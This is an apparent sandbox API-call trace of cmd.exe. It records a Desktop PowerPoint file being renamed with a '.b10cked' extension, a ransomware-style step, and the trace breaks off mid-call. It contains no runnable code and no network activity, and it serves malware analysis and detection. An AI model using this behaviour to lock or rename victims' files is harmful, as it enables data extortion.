[0231.500] OpenThread (dwDesiredAccess=0x1fffff, bInheritHandle=0, dwThreadId=0x3a4) returned 0x38 [0231.500] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76910000 [0231.501] GetProcAddress (hModule=0x76910000, lpProcName="SetThreadUILanguage") returned 0x769624c2 [0231.501] SetThreadUILanguage (LangId=0x0) returned 0x409 [0231.501] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0231.501] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Policies\\Microsoft\\Windows\\System", ulOptions=0x0, samDesired=0x20019, phkResult=0x1afa34 | out: phkResult=0x1afa34*=0x0) returned 0x2 [0231.501] VirtualQuery (in: lpAddress=0x1afa6b, lpBuffer=0x1afa04, dwLength=0x1c | out: lpBuffer=0x1afa04*(BaseAddress=0x1af000, AllocationBase=0xb0000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0231.501] VirtualQuery (in: lpAddress=0xb0000, lpBuffer=0x1afa04, dwLength=0x1c | out: lpBuffer=0x1afa04*(BaseAddress=0xb0000, AllocationBase=0xb0000, AllocationProtect=0x4, RegionSize=0x1000, State=0x2000, Protect=0x0, Type=0x20000)) returned 0x1c [0231.501] VirtualQuery (in: lpAddress=0xb1000, lpBuffer=0x1afa04, dwLength=0x1c | out: lpBuffer=0x1afa04*(BaseAddress=0xb1000, AllocationBase=0xb0000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x104, Type=0x20000)) returned 0x1c [0231.501] VirtualQuery (in: lpAddress=0xb3000, lpBuffer=0x1afa04, dwLength=0x1c | out: lpBuffer=0x1afa04*(BaseAddress=0xb3000, AllocationBase=0xb0000, AllocationProtect=0x4, RegionSize=0xfd000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0231.501] VirtualQuery (in: lpAddress=0x1b0000, lpBuffer=0x1afa04, dwLength=0x1c | out: lpBuffer=0x1afa04*(BaseAddress=0x1b0000, AllocationBase=0x1b0000, AllocationProtect=0x2, RegionSize=0x67000, State=0x1000, Protect=0x2, Type=0x40000)) returned 0x1c [0231.501] GetConsoleOutputCP () returned 0x1b5 [0231.501] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0231.501] SetConsoleCtrlHandler (HandlerRoutine=0x4a9de72a, Add=1) returned 1 [0231.501] _get_osfhandle (_FileHandle=1) returned 0x7 [0231.501] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x0) returned 1 [0231.501] _get_osfhandle (_FileHandle=1) returned 0x7 [0231.501] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a9e41ac | out: lpMode=0x4a9e41ac) returned 1 [0231.502] _get_osfhandle (_FileHandle=1) returned 0x7 [0231.502] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0231.502] _get_osfhandle (_FileHandle=0) returned 0x3 [0231.502] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a9e41b0 | out: lpMode=0x4a9e41b0) returned 1 [0231.502] _get_osfhandle (_FileHandle=0) returned 0x3 [0231.502] SetConsoleMode (hConsoleHandle=0x3, dwMode=0x1a7) returned 1 [0231.502] GetEnvironmentStringsW () returned 0x340178* [0231.502] FreeEnvironmentStringsW (penv=0x340178) returned 1 [0231.502] GetEnvironmentStringsW () returned 0x340178* [0231.502] FreeEnvironmentStringsW (penv=0x340178) returned 1 [0231.502] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x1ae9a4 | out: phkResult=0x1ae9a4*=0x40) returned 0x0 [0231.502] RegQueryValueExW (in: hKey=0x40, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x1ae9ac, lpData=0x1ae9b0, lpcbData=0x1ae9a8*=0x1000 | out: lpType=0x1ae9ac*=0x0, lpData=0x1ae9b0*=0xa0, lpcbData=0x1ae9a8*=0x1000) returned 0x2 [0231.502] RegQueryValueExW (in: hKey=0x40, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x1ae9ac, lpData=0x1ae9b0, lpcbData=0x1ae9a8*=0x1000 | out: lpType=0x1ae9ac*=0x4, lpData=0x1ae9b0*=0x1, lpcbData=0x1ae9a8*=0x4) returned 0x0 [0231.503] RegQueryValueExW (in: hKey=0x40, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x1ae9ac, lpData=0x1ae9b0, lpcbData=0x1ae9a8*=0x1000 | out: lpType=0x1ae9ac*=0x0, lpData=0x1ae9b0*=0x1, lpcbData=0x1ae9a8*=0x1000) returned 0x2 [0231.503] RegQueryValueExW (in: hKey=0x40, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x1ae9ac, lpData=0x1ae9b0, lpcbData=0x1ae9a8*=0x1000 | out: lpType=0x1ae9ac*=0x4, lpData=0x1ae9b0*=0x0, lpcbData=0x1ae9a8*=0x4) returned 0x0 [0231.503] RegQueryValueExW (in: hKey=0x40, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x1ae9ac, lpData=0x1ae9b0, lpcbData=0x1ae9a8*=0x1000 | out: lpType=0x1ae9ac*=0x4, lpData=0x1ae9b0*=0x40, lpcbData=0x1ae9a8*=0x4) returned 0x0 [0231.503] RegQueryValueExW (in: hKey=0x40, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x1ae9ac, lpData=0x1ae9b0, lpcbData=0x1ae9a8*=0x1000 | out: lpType=0x1ae9ac*=0x4, lpData=0x1ae9b0*=0x40, lpcbData=0x1ae9a8*=0x4) returned 0x0 [0231.503] RegQueryValueExW (in: hKey=0x40, lpValueName="AutoRun", lpReserved=0x0, lpType=0x1ae9ac, lpData=0x1ae9b0, lpcbData=0x1ae9a8*=0x1000 | out: lpType=0x1ae9ac*=0x0, lpData=0x1ae9b0*=0x40, lpcbData=0x1ae9a8*=0x1000) returned 0x2 [0231.503] RegCloseKey (hKey=0x40) returned 0x0 [0231.503] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x1ae9a4 | out: phkResult=0x1ae9a4*=0x40) returned 0x0 [0231.503] RegQueryValueExW (in: hKey=0x40, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x1ae9ac, lpData=0x1ae9b0, lpcbData=0x1ae9a8*=0x1000 | out: lpType=0x1ae9ac*=0x0, lpData=0x1ae9b0*=0x40, lpcbData=0x1ae9a8*=0x1000) returned 0x2 [0231.503] RegQueryValueExW (in: hKey=0x40, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x1ae9ac, lpData=0x1ae9b0, lpcbData=0x1ae9a8*=0x1000 | out: lpType=0x1ae9ac*=0x4, lpData=0x1ae9b0*=0x1, lpcbData=0x1ae9a8*=0x4) returned 0x0 [0231.503] RegQueryValueExW (in: hKey=0x40, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x1ae9ac, lpData=0x1ae9b0, lpcbData=0x1ae9a8*=0x1000 | out: lpType=0x1ae9ac*=0x0, lpData=0x1ae9b0*=0x1, lpcbData=0x1ae9a8*=0x1000) returned 0x2 [0231.503] RegQueryValueExW (in: hKey=0x40, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x1ae9ac, lpData=0x1ae9b0, lpcbData=0x1ae9a8*=0x1000 | out: lpType=0x1ae9ac*=0x4, lpData=0x1ae9b0*=0x0, lpcbData=0x1ae9a8*=0x4) returned 0x0 [0231.503] RegQueryValueExW (in: hKey=0x40, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x1ae9ac, lpData=0x1ae9b0, lpcbData=0x1ae9a8*=0x1000 | out: lpType=0x1ae9ac*=0x4, lpData=0x1ae9b0*=0x9, lpcbData=0x1ae9a8*=0x4) returned 0x0 [0231.503] RegQueryValueExW (in: hKey=0x40, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x1ae9ac, lpData=0x1ae9b0, lpcbData=0x1ae9a8*=0x1000 | out: lpType=0x1ae9ac*=0x4, lpData=0x1ae9b0*=0x9, lpcbData=0x1ae9a8*=0x4) returned 0x0 [0231.503] RegQueryValueExW (in: hKey=0x40, lpValueName="AutoRun", lpReserved=0x0, lpType=0x1ae9ac, lpData=0x1ae9b0, lpcbData=0x1ae9a8*=0x1000 | out: lpType=0x1ae9ac*=0x0, lpData=0x1ae9b0*=0x9, lpcbData=0x1ae9a8*=0x1000) returned 0x2 [0231.503] RegCloseKey (hKey=0x40) returned 0x0 [0231.503] time (in: timer=0x0 | out: timer=0x0) returned 0x5b8863bf [0231.503] srand (_Seed=0x5b8863bf) [0231.503] GetCommandLineW () returned="\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\EEBsYm5\\Desktop\\TDXT9-~1.PPT\" \"C:\\Users\\EEBsYm5\\Desktop\\Tdxt9-_3mYM7NtN.pptx.b10cked\"" [0231.503] GetCommandLineW () returned="\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\EEBsYm5\\Desktop\\TDXT9-~1.PPT\" \"C:\\Users\\EEBsYm5\\Desktop\\Tdxt9-_3mYM7NtN.pptx.b10cked\"" [0231.503] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a9e5260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0231.504] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x3418d8, nSize=0x104 | out: lpFilename="C:\\Windows\\system32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe")) returned 0x1b [0231.504] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0231.504] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0231.504] GetEnvironmentVariableW (in: lpName="PROMPT", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0231.504] _wcsicmp (_String1="PROMPT", _String2="CD") returned 13 [0231.504] _wcsicmp (_String1="PROMPT", _String2="ERRORLEVEL") returned 11 [0231.504] _wcsicmp (_String1="PROMPT", _String2="CMDEXTVERSION") returned 13 [0231.504] _wcsicmp (_String1="PROMPT", _String2="CMDCMDLINE") returned 13 [0231.504] _wcsicmp (_String1="PROMPT", _String2="DATE") returned 12 [0231.504] _wcsicmp (_String1="PROMPT", _String2="TIME") returned -4 [0231.504] _wcsicmp (_String1="PROMPT", _String2="RANDOM") returned -2 [0231.504] _wcsicmp (_String1="PROMPT", _String2="HIGHESTNUMANODENUMBER") returned 8 [0231.504] SetEnvironmentVariableW (lpName="PROMPT", lpValue="$P$G") returned 1 [0231.504] GetEnvironmentStringsW () returned 0x3422c8* [0231.504] FreeEnvironmentStringsW (penv=0x3422c8) returned 1 [0231.504] GetEnvironmentVariableW (in: lpName="COMSPEC", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0231.504] GetEnvironmentVariableW (in: lpName="KEYS", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0231.504] _wcsicmp (_String1="KEYS", _String2="CD") returned 8 [0231.504] _wcsicmp (_String1="KEYS", _String2="ERRORLEVEL") returned 6 [0231.504] _wcsicmp (_String1="KEYS", _String2="CMDEXTVERSION") returned 8 [0231.504] _wcsicmp (_String1="KEYS", _String2="CMDCMDLINE") returned 8 [0231.504] _wcsicmp (_String1="KEYS", _String2="DATE") returned 7 [0231.504] _wcsicmp (_String1="KEYS", _String2="TIME") returned -9 [0231.504] _wcsicmp (_String1="KEYS", _String2="RANDOM") returned -7 [0231.504] _wcsicmp (_String1="KEYS", _String2="HIGHESTNUMANODENUMBER") returned 3 [0231.505] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x1af770 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0231.505] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop", nBufferLength=0x104, lpBuffer=0x1af770, lpFilePart=0x1af76c | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop", lpFilePart=0x1af76c*="Desktop") returned 0x18 [0231.505] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 0x11 [0231.505] FindFirstFileW (in: lpFileName="C:\\Users", lpFindFileData=0x1af4ec | out: lpFindFileData=0x1af4ec) returned 0x340008 [0231.505] FindClose (in: hFindFile=0x340008 | out: hFindFile=0x340008) returned 1 [0231.505] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5", lpFindFileData=0x1af4ec | out: lpFindFileData=0x1af4ec) returned 0x340008 [0231.505] FindClose (in: hFindFile=0x340008 | out: hFindFile=0x340008) returned 1 [0231.505] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop", lpFindFileData=0x1af4ec | out: lpFindFileData=0x1af4ec) returned 0x340008 [0231.505] FindClose (in: hFindFile=0x340008 | out: hFindFile=0x340008) returned 1 [0231.505] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 0x11 [0231.505] SetCurrentDirectoryW (lpPathName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 1 [0231.505] SetEnvironmentVariableW (lpName="=C:", lpValue="C:\\Users\\EEBsYm5\\Desktop") returned 1 [0231.505] GetEnvironmentStringsW () returned 0x342ae8* [0231.506] FreeEnvironmentStringsW (penv=0x342ae8) returned 1 [0231.506] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a9e5260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0231.506] GetConsoleOutputCP () returned 0x1b5 [0231.506] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0231.506] GetUserDefaultLCID () returned 0x409 [0231.506] GetLocaleInfoW (in: Locale=0x409, LCType=0x1e, lpLCData=0x4a9e4950, cchData=8 | out: lpLCData=":") returned 2 [0231.507] GetLocaleInfoW (in: Locale=0x409, LCType=0x23, lpLCData=0x1af8b0, cchData=128 | out: lpLCData="0") returned 2 [0231.507] GetLocaleInfoW (in: Locale=0x409, LCType=0x21, lpLCData=0x1af8b0, cchData=128 | out: lpLCData="0") returned 2 [0231.507] GetLocaleInfoW (in: Locale=0x409, LCType=0x24, lpLCData=0x1af8b0, cchData=128 | out: lpLCData="1") returned 2 [0231.507] GetLocaleInfoW (in: Locale=0x409, LCType=0x1d, lpLCData=0x4a9e4940, cchData=8 | out: lpLCData="/") returned 2 [0231.507] GetLocaleInfoW (in: Locale=0x409, LCType=0x31, lpLCData=0x4a9e4d80, cchData=32 | out: lpLCData="Mon") returned 4 [0231.507] GetLocaleInfoW (in: Locale=0x409, LCType=0x32, lpLCData=0x4a9e4d40, cchData=32 | out: lpLCData="Tue") returned 4 [0231.507] GetLocaleInfoW (in: Locale=0x409, LCType=0x33, lpLCData=0x4a9e4d00, cchData=32 | out: lpLCData="Wed") returned 4 [0231.507] GetLocaleInfoW (in: Locale=0x409, LCType=0x34, lpLCData=0x4a9e4cc0, cchData=32 | out: lpLCData="Thu") returned 4 [0231.507] GetLocaleInfoW (in: Locale=0x409, LCType=0x35, lpLCData=0x4a9e4c80, cchData=32 | out: lpLCData="Fri") returned 4 [0231.507] GetLocaleInfoW (in: Locale=0x409, LCType=0x36, lpLCData=0x4a9e4c40, cchData=32 | out: lpLCData="Sat") returned 4 [0231.507] GetLocaleInfoW (in: Locale=0x409, LCType=0x37, lpLCData=0x4a9e4c00, cchData=32 | out: lpLCData="Sun") returned 4 [0231.507] GetLocaleInfoW (in: Locale=0x409, LCType=0xe, lpLCData=0x4a9e4930, cchData=8 | out: lpLCData=".") returned 2 [0231.507] GetLocaleInfoW (in: Locale=0x409, LCType=0xf, lpLCData=0x4a9e4920, cchData=8 | out: lpLCData=",") returned 2 [0231.507] setlocale (category=0, locale=".OCP") returned="English_United States.437" [0231.508] GetConsoleTitleW (in: lpConsoleTitle=0x3308d8, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0231.508] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76910000 [0231.508] GetProcAddress (hModule=0x76910000, lpProcName="CopyFileExW") returned 0x7694ac6c [0231.508] GetProcAddress (hModule=0x76910000, lpProcName="IsDebuggerPresent") returned 0x76953ea8 [0231.508] GetProcAddress (hModule=0x76910000, lpProcName="SetConsoleInputExeNameW") returned 0x76962732 [0231.509] _wcsicmp (_String1="move", _String2=")") returned 68 [0231.509] _wcsicmp (_String1="FOR", _String2="move") returned -7 [0231.509] _wcsicmp (_String1="FOR/?", _String2="move") returned -7 [0231.509] _wcsicmp (_String1="IF", _String2="move") returned -4 [0231.509] _wcsicmp (_String1="IF/?", _String2="move") returned -4 [0231.509] _wcsicmp (_String1="REM", _String2="move") returned 5 [0231.509] _wcsicmp (_String1="REM/?", _String2="move") returned 5 [0231.512] GetConsoleTitleW (in: lpConsoleTitle=0x1af5a8, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0231.513] _wcsicmp (_String1="move", _String2="DIR") returned 9 [0231.513] _wcsicmp (_String1="move", _String2="ERASE") returned 8 [0231.513] _wcsicmp (_String1="move", _String2="DEL") returned 9 [0231.513] _wcsicmp (_String1="move", _String2="TYPE") returned -7 [0231.513] _wcsicmp (_String1="move", _String2="COPY") returned 10 [0231.513] _wcsicmp (_String1="move", _String2="CD") returned 10 [0231.513] _wcsicmp (_String1="move", _String2="CHDIR") returned 10 [0231.513] _wcsicmp (_String1="move", _String2="RENAME") returned -5 [0231.513] _wcsicmp (_String1="move", _String2="REN") returned -5 [0231.513] _wcsicmp (_String1="move", _String2="ECHO") returned 8 [0231.513] _wcsicmp (_String1="move", _String2="SET") returned -6 [0231.513] _wcsicmp (_String1="move", _String2="PAUSE") returned -3 [0231.513] _wcsicmp (_String1="move", _String2="DATE") returned 9 [0231.513] _wcsicmp (_String1="move", _String2="TIME") returned -7 [0231.513] _wcsicmp (_String1="move", _String2="PROMPT") returned -3 [0231.513] _wcsicmp (_String1="move", _String2="MD") returned 11 [0231.513] _wcsicmp (_String1="move", _String2="MKDIR") returned 4 [0231.513] _wcsicmp (_String1="move", _String2="RD") returned -5 [0231.513] _wcsicmp (_String1="move", _String2="RMDIR") returned -5 [0231.513] _wcsicmp (_String1="move", _String2="PATH") returned -3 [0231.513] _wcsicmp (_String1="move", _String2="GOTO") returned 6 [0231.513] _wcsicmp (_String1="move", _String2="SHIFT") returned -6 [0231.514] _wcsicmp (_String1="move", _String2="CLS") returned 10 [0231.514] _wcsicmp (_String1="move", _String2="CALL") returned 10 [0231.514] _wcsicmp (_String1="move", _String2="VERIFY") returned -9 [0231.514] _wcsicmp (_String1="move", _String2="VER") returned -9 [0231.514] _wcsicmp (_String1="move", _String2="VOL") returned -9 [0231.514] _wcsicmp (_String1="move", _String2="EXIT") returned 8 [0231.514] _wcsicmp (_String1="move", _String2="SETLOCAL") returned -6 [0231.514] _wcsicmp (_String1="move", _String2="ENDLOCAL") returned 8 [0231.514] _wcsicmp (_String1="move", _String2="TITLE") returned -7 [0231.514] _wcsicmp (_String1="move", _String2="START") returned -6 [0231.514] _wcsicmp (_String1="move", _String2="DPATH") returned 9 [0231.514] _wcsicmp (_String1="move", _String2="KEYS") returned 2 [0231.514] _wcsicmp (_String1="move", _String2="MOVE") returned 0 [0231.516] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0231.516] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0231.516] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x1af364, nVolumeNameSize=0x104, lpVolumeSerialNumber=0x1af35c, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer="SYSTEM", lpVolumeSerialNumber=0x1af35c*=0x90c08a66, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1 [0231.516] _wcsnicmp (_String1="COPYCMD", _String2="=C:=C:\\", _MaxCount=0x7) returned 38 [0231.516] _wcsnicmp (_String1="COPYCMD", _String2="ALLUSER", _MaxCount=0x7) returned 2 [0231.516] _wcsnicmp (_String1="COPYCMD", _String2="APPDATA", _MaxCount=0x7) returned 2 [0231.516] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0231.516] _wcsnicmp (_String1="COPYCMD", _String2="COMPUTE", _MaxCount=0x7) returned 3 [0231.516] _wcsnicmp (_String1="COPYCMD", _String2="ComSpec", _MaxCount=0x7) returned 3 [0231.516] _wcsnicmp (_String1="COPYCMD", _String2="FP_NO_H", _MaxCount=0x7) returned -3 [0231.516] _wcsnicmp (_String1="COPYCMD", _String2="HOMEDRI", _MaxCount=0x7) returned -5 [0231.516] _wcsnicmp (_String1="COPYCMD", _String2="HOMEPAT", _MaxCount=0x7) returned -5 [0231.517] _wcsnicmp (_String1="COPYCMD", _String2="LOCALAP", _MaxCount=0x7) returned -9 [0231.517] _wcsnicmp (_String1="COPYCMD", _String2="LOGONSE", _MaxCount=0x7) returned -9 [0231.517] _wcsnicmp (_String1="COPYCMD", _String2="NUMBER_", _MaxCount=0x7) returned -11 [0231.517] _wcsnicmp (_String1="COPYCMD", _String2="OS=Wind", _MaxCount=0x7) returned -12 [0231.517] _wcsnicmp (_String1="COPYCMD", _String2="Path=C:", _MaxCount=0x7) returned -13 [0231.517] _wcsnicmp (_String1="COPYCMD", _String2="PATHEXT", _MaxCount=0x7) returned -13 [0231.517] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0231.517] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0231.517] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0231.517] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0231.517] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0231.517] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0231.517] _wcsnicmp (_String1="COPYCMD", _String2="PROMPT=", _MaxCount=0x7) returned -13 [0231.517] _wcsnicmp (_String1="COPYCMD", _String2="PSModul", _MaxCount=0x7) returned -13 [0231.517] _wcsnicmp (_String1="COPYCMD", _String2="PUBLIC=", _MaxCount=0x7) returned -13 [0231.517] _wcsnicmp (_String1="COPYCMD", _String2="SystemD", _MaxCount=0x7) returned -16 [0231.517] _wcsnicmp (_String1="COPYCMD", _String2="SystemR", _MaxCount=0x7) returned -16 [0231.517] _wcsnicmp (_String1="COPYCMD", _String2="TEMP=C:", _MaxCount=0x7) returned -17 [0231.517] _wcsnicmp (_String1="COPYCMD", _String2="TMP=C:\\", _MaxCount=0x7) returned -17 [0231.517] _wcsnicmp (_String1="COPYCMD", _String2="USERDOM", _MaxCount=0x7) returned -18 [0231.517] _wcsnicmp (_String1="COPYCMD", _String2="USERNAM", _MaxCount=0x7) returned -18 [0231.517] _wcsnicmp (_String1="COPYCMD", _String2="USERPRO", _MaxCount=0x7) returned -18 [0231.517] _wcsnicmp (_String1="COPYCMD", _String2="windir=", _MaxCount=0x7) returned -20 [0231.517] _wcsnicmp (_String1="/Y", _String2="/Y", _MaxCount=0x2) returned 0 [0231.517] _wcsicmp (_String1="TDXT9-~1.PPT", _String2=".") returned 70 [0231.517] _wcsicmp (_String1="TDXT9-~1.PPT", _String2="..") returned 70 [0231.517] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop\\TDXT9-~1.PPT" (normalized: "c:\\users\\eebsym5\\desktop\\tdxt9-~1.ppt")) returned 0x20 [0231.518] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x341d50 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0231.518] SetErrorMode (uMode=0x0) returned 0x0 [0231.518] SetErrorMode (uMode=0x1) returned 0x0 [0231.518] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop\\TDXT9-~1.PPT", nBufferLength=0x104, lpBuffer=0x1aecec, lpFilePart=0x1aecd4 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop\\TDXT9-~1.PPT", lpFilePart=0x1aecd4*="TDXT9-~1.PPT") returned 0x25 [0231.518] SetErrorMode (uMode=0x0) returned 0x1 [0231.518] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 0x11 [0231.518] _wcsicmp (_String1="TDXT9-~1.PPT", _String2=".") returned 70 [0231.518] _wcsicmp (_String1="TDXT9-~1.PPT", _String2="..") returned 70 [0231.518] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop\\TDXT9-~1.PPT" (normalized: "c:\\users\\eebsym5\\desktop\\tdxt9-~1.ppt")) returned 0x20 [0231.518] SetErrorMode (uMode=0x0) returned 0x0 [0231.518] SetErrorMode (uMode=0x1) returned 0x0 [0231.518] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop\\TDXT9-~1.PPT", nBufferLength=0x104, lpBuffer=0x1af168, lpFilePart=0x1aef00 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop\\TDXT9-~1.PPT", lpFilePart=0x1aef00*="TDXT9-~1.PPT") returned 0x25 [0231.518] SetErrorMode (uMode=0x0) returned 0x1 [0231.518] SetErrorMode (uMode=0x0) returned 0x0 [0231.518] SetErrorMode (uMode=0x1) returned 0x0 [0231.518] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop\\Tdxt9-_3mYM7NtN.pptx.b10cked", nBufferLength=0x104, lpBuffer=0x1af370, lpFilePart=0x1aef00 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop\\Tdxt9-_3mYM7NtN.pptx.b10cked", lpFilePart=0x1aef00*="Tdxt9-_3mYM7NtN.pptx.b10cked") returned 0x35 [0231.518] SetErrorMode (uMode=0x0) returned 0x1 [0231.519] SetLastError (dwErrCode=0x0) [0231.519] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop\\Tdxt9-_3mYM7NtN.pptx.b10cked" (normalized: "c:\\users\\eebsym5\\desktop\\tdxt9-_3mym7ntn.pptx.b10cked")) returned 0xffffffff [0231.519] GetLastError () returned 0x2 [0231.519] FindFirstFileExW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop\\TDXT9-~1.PPT", fInfoLevelId=0x1, lpFindFileData=0x1ae87c, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x1ae87c) returned 0x330f20 [0231.519] FindNextFileW (in: hFindFile=0x330f20, lpFindFileData=0x1ae87c | out: lpFindFileData=0x1ae87c) returned 0 [0231.519] GetLastError () returned 0x12 [0231.519] FindClose (in: hFindFile=0x330f20 | out: hFindFile=0x330f20) returned 1 [0231.520] FindFirstFileExW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop\\TDXT9-~1.PPT", fInfoLevelId=0x1, lpFindFileData=0x341af0, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x341af0) returned 0x330f20 [0231.520] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop\\Tdxt9-_3mYM7NtN.pptx.b10cked", nBufferLength=0x104, lpBuffer=0x1aeb14, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop\\Tdxt9-_3mYM7NtN.pptx.b10cked", lpFilePart=0x0) returned 0x35 [0231.520] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop\\Tdxt9-_3mYM7NtN.pptx", nBufferLength=0x104, lpBuffer=0x1aeb14, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop\\Tdxt9-_3mYM7NtN.pptx", lpFilePart=0x0) returned 0x2d [0231.520] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop\\Tdxt9-_3mYM7NtN.pptx" (normalized: "c:\\users\\eebsym5\\desktop\\tdxt9-_3mym7ntn.pptx")) returned 0x20 [0231.520] MoveFileExW (lpExistingFileName="C:\\Users\\EEBsYm5\\Desktop\\Tdxt9-_3mYM7NtN.pptx" (normalized: "c:\\users\\eebsym5\\desktop\\tdxt9-_3mym7ntn.pptx"), lpNewFileName="C:\\Users\\EEBsYm5\\Desktop\\Tdxt9-_3mYM7NtN.pptx.b10cked" (normalized: "c:\\users\\eebsym5\\desktop\\tdxt9-_3mym7ntn.pptx.b10cked"), dwFlags=0x3) returned 1 [0231.521] FindClose (in: hFindFile=0x330f20 | out: hFindFile=0x330f20) returned 1 [0231.521] _vsnwprintf (in: 